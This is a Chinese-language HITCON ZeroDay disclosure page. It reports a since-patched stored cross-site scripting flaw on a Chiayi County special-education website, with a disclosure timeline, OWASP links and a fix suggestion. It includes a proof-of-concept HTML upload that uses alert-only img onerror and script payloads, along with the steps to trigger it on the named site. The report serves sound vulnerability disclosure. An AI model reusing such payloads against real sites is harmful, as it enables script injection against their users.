Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00721
- Vendor: TACERT台灣學術網路危機處理中心
- Title: 嘉義縣特教資訊網 Stored-XSS
- Introduction: Stored-XSS
處理狀態
目前狀態
公開
Last Update : 2019/08/22
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2019/07/25 00:10:40 : 新提交 (由 SomeApple 更新此狀態)
- 2019/07/25 23:04:52 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/07/29 17:29:10 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/07/29 17:29:10 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/07/29 17:29:10 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/08/14 14:55:14 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/08/22 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00721
- 通報者:jk82421 (SomeApple)
- 風險:低
- 類型:預存式跨站腳本攻擊 (Stored Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://k12cc.tw/Site/kc13491/dir_vi1Ik1/file_ZsYr8B.txt&random_path=N6247D594003271B3B16385A250C7FYP
敘述
在 http://spcedu.cyc.edu.tw/spcedu/ 按最上面按鈕上傳此 html 檔案
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<img src="" onerror=alert("XSS_IMG")>
<script>
alert("XSS")
</script>
</body>
</html>
然後找到連結 http://k12cc.tw/Site/kc13491/dir_vi1Ik1/file_ZsYr8B.txt&random_path=N6247D594003271B3B16385A250C7FYP
修補建議
過濾上傳的副檔名或是內容
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。